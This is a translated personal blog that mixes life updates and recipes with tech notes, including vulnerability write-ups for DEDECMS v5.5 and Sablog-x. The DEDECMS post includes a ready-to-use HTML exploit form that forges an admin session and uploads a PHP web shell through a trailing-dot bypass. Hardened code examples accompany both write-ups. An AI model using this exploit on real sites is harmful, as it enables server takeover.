Bad luck

Sigh, my right eye has started twitching again lately; every time that happens something bad follows...

A couple of days ago someone smashed the two electricity meters outside the old house we rent out. I called 110 (the police), but it doesn't seem to have done much... a little disappointed...

I've got two or three small cuts on my hands, had a fight with my wife over some things, and there are countless other depressing matters...

Today my dear grandmother also passed away. I hope she rests in peace and that all is well for her in heaven.

I had originally typed a lot more, but thinking it over I decided to delete it; it was too much of a mess....

In this life we bring nothing with us when we are born and take nothing with us when we die. Happy or sad, the days pass either way. Am I living too wearily? Is it time for a change?

Author: st0p
Please credit the source when reposting: http://www.st0p.org

Only today did I see the post "DEDECMS v5.5 GBK Final 的一个鸡肋漏洞" (a marginal vulnerability in DEDECMS v5.5 GBK Final) published by toby57 on Wolves Security Team; original: http://bbs.wolvez.org/topic/125/

I tested it locally. The SESSION-overwrite part really is marginal, because it requires session.auto_start = 1, and session.auto_start is normally off. The shell-upload part that follows, though, is usable once you have made it into the admin backend.

Also, session.auto_start is normally used together with session_start(). From what I looked up, it is only possible when session.auto_start is on and session_start() is called first. I haven't looked into exactly how the SESSION gets overwritten; tracking it down would give me a headache... I'll look at it when I have time.

As far as I can tell, both the GBK and the UTF8 builds have this problem; I don't know why the discoverer only put GBK in the title...

Looking at /include/dialog/select_soft_post.php:

The problem is in the renaming step after a filename is specified manually. When the new name is st0p.php. (note the trailing dot after php), the validation is skipped. The saved filename keeps that trailing dot; on Windows the filesystem silently drops a trailing dot, so the file lands on disk as st0p.php (which is why the EXP below strips the last character when it builds the URL). On Apache with mod_php configured via AddHandler, a name like st0p.php. is still dispatched to PHP as well, because the handler matches the .php segment anywhere in the name. Here is the code:

......
// filename (first branch: specified manually; second branch: generated automatically)
if(!empty($newname))
{
	$filename = $newname; // our new name is st0p.php.
	if(!ereg("\.", $filename)) $fs = explode('.', $uploadfile_name); // used when $filename contains no dot
	else $fs = explode('.', $filename); // used when $filename contains a dot
	if(eregi($cfg_not_allowall, $fs[count($fs)-1])) // $fs[count($fs)-1] is the empty string, so the check is skipped
	{
		ShowMsg("The filename you specified is forbidden by the system!",'javascript:;');
		exit();
	}
	if(!ereg("\.", $filename)) $filename = $filename.'.'.$fs[count($fs)-1];
}
else
{
	$filename = $cuserLogin->getUserID().'-'.dd2char(MyDate('ymdHis',$nowtme));
	$fs = explode('.', $uploadfile_name);
	if(eregi($cfg_not_allowall, $fs[count($fs)-1]))
	{
		ShowMsg("You uploaded a file that may be unsafe; the system refused the operation!",'javascript:;');
		exit();
	}
	$filename = $filename.'.'.$fs[count($fs)-1];
}
$fullfilename = $cfg_basedir.$activepath.'/'.$filename; // heh, validation skipped, $filename is still st0p.php.
$fullfileurl = $activepath.'/'.$filename;
move_uploaded_file($uploadfile,$fullfilename) or die("Failed to upload file to $fullfilename!");
@unlink($uploadfile);
......
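To make the bypass concrete, here is an added example (my code, not DEDECMS's) that reproduces the legacy check beside a hardened one and runs both over a few constructed filenames. It uses preg_match() because ereg()/eregi() were removed in PHP 7, and the value of $cfg_not_allowall is an assumed stand-in with the same shape as the real setting, which the page does not show.

```php
<?php
// Added example (not DEDECMS code): the trailing-dot bypass in select_soft_post.php,
// legacy check beside a hardened one. preg_match() stands in for the removed eregi().
// $cfg_not_allowall's real value is not on the page; this pattern is an assumed stand-in.
$cfg_not_allowall = 'php|pl|cgi|asp|aspx|jsp|php5|sh|py';

// Legacy logic: split on '.', test only the last element against the blacklist.
// For "st0p.php." the last element is "" and no alternative in the pattern matches it.
function legacy_allows(string $filename, string $blacklist): bool
{
    $fs = explode('.', $filename);
    $ext = $fs[count($fs) - 1];
    return !preg_match('/' . $blacklist . '/i', $ext);
}

// Hardened logic: normalise the name the way the target filesystem will,
// then require every extension segment to come from an allow-list.
function hardened_allows(string $filename, array $allowlist): bool
{
    // Windows strips trailing dots and spaces; strip them here so the name we
    // check is the name that will actually exist on disk.
    $name = rtrim($filename, ". ");
    // Refuse empty names, path separators and control characters.
    if ($name === '' || $name !== basename($name) || preg_match('/[\x00-\x1f\/\\\\]/', $name)) {
        return false;
    }
    $segments = explode('.', $name);
    if (count($segments) < 2) {
        return false; // no extension at all: refuse rather than guess one
    }
    // Every dot-separated segment after the base must be allowed, so "x.php.jpg"
    // is refused too; Apache's AddHandler matches a .php segment anywhere in the name.
    foreach (array_slice($segments, 1) as $segment) {
        if (!in_array(strtolower($segment), $allowlist, true)) {
            return false;
        }
    }
    return true;
}

$allowlist = ['jpg', 'jpeg', 'gif', 'png', 'zip', 'rar'];

// Constructed candidates: the bypass name, its upper-case variant, and a double extension.
foreach (['photo.jpg', 'st0p.php', 'st0p.php.', 'st0p.PHP.', 'st0p.php ', 'st0p.php.jpg'] as $candidate) {
    printf("%-14s legacy=%s hardened=%s\n",
        $candidate,
        legacy_allows($candidate, $cfg_not_allowall) ? 'allow' : 'block',
        hardened_allows($candidate, $allowlist) ? 'allow' : 'block');
}
```

The legacy function lets st0p.php., st0p.PHP. and st0p.php.jpg through while blocking st0p.php; the hardened one refuses all four, because it trims what the filesystem would trim and checks every segment against an allow-list instead of looking for a bad word in the last one.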

The EXP is as follows:

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>DEDECMS v5.5 Final select_soft_post.php EXP</title>
<script type="text/javascript">
function fsubmit(){
    var form = document.forms[0];
    form.action = form.target.value + form.path.value;
    tmpstr = form.target.value +'/'+ form.newname.value;
    form.bkurl.value = tmpstr.substr(0,tmpstr.length-1);
    form.submit();
    }
</script>
<style type="text/css">
<!--
body {
	text-align: center;
}
-->
</style>
</head>
 
<body>
<h3>DEDECMS v5.5 Final select_soft_post.php EXP</h3>
<form action="" method="post" enctype="multipart/form-data">
  <p>
    <input type="hidden" name="_SESSION[dede_admin_id]" value="1" />
    <input type="hidden" name="bkurl" value="1" />
    <label>Target:
      <input name="target" type="text" id="target" value="http://target" />
    </label>
    <label>Path:
      <input name="path" type="text" id="path" value="/include/dialog/select_soft_post.php" />
    </label>
    <label>File:
      <input type="file" name="uploadfile" id="uploadfile" />
    </label>
    <label>NewName:
      <input name="newname" type="text" id="newname" value="shell.php." />
    </label>
    &nbsp;<input type="submit" name="button" id="button" value="Fuck" onclick="fsubmit()" />
  </p>
</form>
</body>
</html>

Source: http://www.52crack.com/blog/?action=show&id=487

You don't need any identity documents or other paperwork at all. All you need is to confirm that the admin e-mail address in the WHOIS record belongs to you, and that's it.

Everything below assumes that premise; if you proceed otherwise, any consequences are your own responsibility!

The most effective route is to file a complaint with InterNIC at http://reports.internic.net/cgi/registrars/problem-report.cgi

There you only need to fill in your personal details and then, among the radio buttons below, pick the one at the bottom right:

Transfer Problems -
Auth Codes
Locked Domain
Fraudulent Transfer
Registrar Denied Transfer

As consumers we should stand up for our rights rather than swallow our grievances; staying quiet only emboldens the bad actors. I won't say much about certain Chinese domain registrars and their resellers; if you have ever been given the run-around when transferring a domain, please go to the address above and file a complaint against them.

HiChina (万网): HICHINA ZHICHENG TECHNOLOGY LTD.

Xinnet Hulian (新网互联): BEIJING INNOVATIVE LINKAGE TECHNOLOGY LTD. DBA DNS.COM.CN

Xinnet Xinhai (新网信海): XIN NET TECHNOLOGY CORPORATION

PS: Xinnet Xinhai is actually not bad; I e-mailed my reseller and received the transfer auth code three working days later. So choosing a good reseller when registering a domain matters too.

Sample letter 1
Hello, I registered xxxx.com and xxxx.com through HICHINA ZHICHENG TECHNOLOGY LTD.
I am not satisfied with their services, and I want to transfer my domains to name.com.
Since April 20th, 2009, I have done everything they told me to do. I have sent them a copy of my government ID card.
And I have phoned them many times. Every time they say I will receive my auth code soon, but every time I log in to my e-mail, "xxxx@xxxx.com", I still have not received the auth codes.
They restrict users from transferring their domains particularly severely. I have wasted about a month but still can't get my auth code.
Today they asked me to wait 60 days and then start the transfer again.
They will not give me the auth codes to transfer the domain. Please, please help me transfer my domain. HICHINA is a very bad domain registrar.

Sample letter 2
This is a domain name complaint letter about the HiChina registrar that I am sending for the third time. I am the domain owner of xxxxxx and want to transfer my domains from HiChina (HiChina Zhicheng Technology Limited, www.net.cn) to GoDaddy.com, Inc.

But after I submitted the information, including photocopies of my ID card and passport, and confirmed by telephone that they had received it, HICHINA refused to process the transfer, the reason being that the application form was incomplete. In fact I submitted it twice to meet their requirements.

First time: around 23rd Dec 2008 I sent the application form and a photocopy of my ID card. They replied that I had left one required item empty and had not signed;

Second time: around 8th Feb 2009 I sent the application form with signature and every item completed, with a photocopy of my passport attached (at HiChina's request). But they still refused for the same reason. I don't know what I can do to meet their requirements.

I feel this is irresponsible and that it breaks the ICANN domain policy for no good reason. I need your help.

Sample letter 3
To the ICANN administrator:
Dear ICANN administrator, happy new year.
This is a domain name complaint letter about changing registrars. I am the domain owner and want to transfer some domains from the registrar HICHINA WEB SOLUTIONS (HONG KONG) LIMITED to eNom
(xxx.com, xx.net, xx.com, xx.com, xxxx.com...)
But after I submitted the EMS info to them and confirmed they had received it (by e-mail and telephone), HICHINA refused to proceed with the process and then gave no response.
I feel this is irresponsible and that it breaks the ICANN domain policy for no good reason. I need your help.
My agent ID: xxx, name xxx. Thanks a lot.
Server info:
Domain Name: xxx
Registrar: HICHINA WEB SOLUTIONS (HONG KONG) LIMITED
Whois Server: grs.hichina.com
Referral URL: http://whois.hichina.com

MSSQL bcp usage

Export data via a SQL query:

bcp "select * from info..info where date between '2010-02-01' and '2010-02-04'" queryout "d:\info.out" -SST0P-PC\SQLEXPRESS -Usa -P123456 -c

Export a table's data directly:

bcp dbname.dbo.tablename out d:\tablename.dat -T -n

Here ST0P-PC\SQLEXPRESS after -S is my local server name,
-U is followed by the username,
-P (upper case; bcp switches are case-sensitive) is followed by the password.

Note that a password given with -P on the command line ends up in the shell history and is visible to other local users in the process list. On a machine you do not fully control, leave -P out so bcp prompts for the password, or use -T for a trusted (Windows authentication) connection as in the second example.

Run bcp /? for help:

usage: bcp {dbtable | query} {in | out | queryout | format} datafile
[-m maxerrors] [-f formatfile] [-e errfile]
[-F firstrow] [-L lastrow] [-b batchsize]
[-n native type] [-c character type] [-w wide character type]
[-N keep non-text native] [-V file format version] [-q quoted identifier]
[-C code page specifier] [-t field terminator] [-r row terminator]
[-i inputfile] [-o outfile] [-a packetsize]
[-S server name] [-U username] [-P password]
[-T trusted connection] [-v version] [-R regional enable]
[-k keep null values] [-E keep identity values]
[-h "load hints"] [-x generate xml format file]

author: 80vul-B
team:http://www.80vul.com

1 Description:

Because of a logic flaw in how $_EVO is initialised in Sablog-x v2.x's common.inc.php, extract() can be used to overwrite arbitrary variables, which in turn leads to XSS, SQL injection, code execution and many other serious vulnerabilities.

2 Analysis

In common.inc.php:

....
$onoff = function_exists('ini_get') ? ini_get('register_globals') : get_cfg_var('register_globals');
if ($onoff != 1) {
	@extract($_COOKIE, EXTR_SKIP);
	@extract($_POST, EXTR_SKIP);
	@extract($_GET, EXTR_SKIP);
}
...
$sax_auth_key = md5($onlineip.$_SERVER['HTTP_USER_AGENT']);
list($sax_uid, $sax_pw, $sax_logincount) = $_COOKIE['sax_auth'] ? explode("\t", authcode($_COOKIE['sax_auth'], 'DECODE')) : array('', '', '');
$sax_hash = sax_addslashes($_COOKIE['sax_hash']);
...
$seccode = $sessionexists = 0;
if ($sax_hash) {
...
	if ($_EVO = $DB->fetch_array($query)){ // $_EVO is initialised inside if ($sax_hash); when that condition is false the initialisation is skipped
...
}
if(!$sessionexists) {
	if($sax_uid) {
		if(!($_EVO = $DB->fetch_one_array("SELECT $userfields FROM {$db_prefix}users u WHERE u.userid='$sax_uid' AND u.password='$sax_pw' AND u.lastip='$onlineip'"))) {
...
@extract($_EVO); // overwrites arbitrary variables
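The following is an added example (not Sablog-x's code) that simulates the flow above with constructed arrays in place of $_COOKIE and $_GET, so it runs offline. It shows why EXTR_SKIP does not protect $_EVO, how the final extract() then replaces a setting, and two changes that close the hole. The variable names follow the analysis; the request values and the stand-in user row are made up.

```php
<?php
// Added example (not Sablog-x code): why the $_EVO flow lets request data overwrite
// any variable, and one way to close it. Constructed arrays stand in for $_GET/$_COOKIE.
function run(array $get, array $cookie, bool $hardened): array
{
    $db_prefix = 'sax_';   // a setting that must never be attacker-controlled
    $sax_uid   = '';       // the visitor presents no valid sax_auth cookie
    $sax_hash  = '';       // ... and no sax_hash cookie either

    if ($hardened) {
        $_EVO = array();   // fix 1: define $_EVO before any extract() runs,
                           // so EXTR_SKIP below refuses a request-supplied _EVO
    }

    // What Sablog-x does when register_globals is off. EXTR_SKIP only protects
    // variables that already exist; an undefined $_EVO is created from _EVO[...].
    extract($cookie, EXTR_SKIP);
    extract($get, EXTR_SKIP);

    // The real initialisation of $_EVO lives inside if ($sax_hash) / if ($sax_uid).
    // With neither cookie present it never runs, and the request-supplied $_EVO survives.
    if ($sax_hash || $sax_uid) {
        $_EVO = array('userid' => 1, 'username' => 'admin'); // stand-in for the DB row
    }

    if ($hardened) {
        // fix 2: copy only the fields you expect, with the type you expect,
        // instead of extract()ing a whole row into the global scope.
        $userid   = isset($_EVO['userid']) ? (int) $_EVO['userid'] : 0;
        $username = isset($_EVO['username']) ? (string) $_EVO['username'] : '';
    } else {
        @extract($_EVO);   // default flag is EXTR_OVERWRITE: any variable can be replaced
    }

    return array(
        'db_prefix' => $db_prefix,
        'userid'    => isset($userid) ? $userid : 0,
    );
}

// Constructed attacker request, equivalent to ?_EVO[db_prefix]=evil_&_EVO[userid]=1
$attack_get = array('_EVO' => array('db_prefix' => 'evil_', 'userid' => '1'));

var_dump(run($attack_get, array(), false)); // vulnerable: db_prefix => 'evil_', userid => '1'
var_dump(run($attack_get, array(), true));  // hardened:   db_prefix => 'sax_',  userid => 0
```

In the vulnerable run the unauthenticated request both rewrites $db_prefix (the table prefix that is later interpolated into SQL) and fakes a logged-in userid; in the hardened run neither value moves. Initialising $_EVO first is the minimal patch; dropping extract() on database rows altogether removes the class of bug.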


Happy New Year

Wishing everyone a happy new year and good fortune in the Year of the Tiger!

My home-made dry pot chicken

Heh, I was craving meat, so here are some pictures of the dry pot chicken I made myself.
It was evening and the light was poor; for some photos I used a torch for light. Sigh, lousy phone, the photos just don't come out...

The two above are the chicken pieces fresh out of the wok, very numbing and spicy. Then I kept going and added coriander, mushrooms, wood ear, soybean sprouts, celery shoots, tofu skin, sesame, chilli... heating it as we ate: numbing, spicy, fresh and fragrant, red broth, red chillies, green coriander, yellow soybean sprouts, black wood ear, white mushrooms, sesame, tofu skin, and the golden meat... delicious!



ime-mode
Syntax:
ime-mode : auto | active | inactive | disabled
Values:
auto : the default. Does not affect the IME state; same as not specifying ime-mode at all
active : all characters are entered through the IME, i.e. the local-language input method is activated. The user can still deactivate the IME
inactive : all characters are entered without the IME, i.e. non-local-language input is active. The user can still activate the IME
disabled : the IME is completely disabled. For the focused control (e.g. an input box) the user cannot activate the IME

Note that ime-mode is a non-standard property, historically honoured only by Internet Explorer and Firefox. It only influences the client's input method, so it is a usability hint, not an input-validation control; whatever a form field accepts still has to be validated on the server.

Got our marriage certificate

Sigh, getting married is exhausting. I had wanted to go on a trip with my wife, but lately there has been so much going on that nothing came of it...
Today we went to get the certificate. It wasn't what I imagined: the service attitude wasn't great, rather indifferent, and it looked like more people were there to divorce than to marry...
Mum and Dad's certificate that I saw before was a single sheet; now I see it's two little booklets, one each...
Four 1-inch photos of the two of us together: 20 yuan
Photocopying ID cards: 2 yuan
Marriage certificate fee: 9 yuan
31 yuan in total. No longer single... "married", what an awkward word...
Lately I've been dealing with post-wedding chores, moving my wife's household registration over, then recharging my skills and working hard to earn money...

Auto-mounting NTFS partitions on Ubuntu

Sigh, without auto-mounting they are quite a hassle to use. The method below is very simple..

sudo apt-get install ntfs-config

sudo ntfs-config

ntfs-config writes the mount entries for you; afterwards check the resulting lines in /etc/fstab, because an ntfs-3g mount without uid, gid or umask options presents every file on the partition as readable and writable by every local user.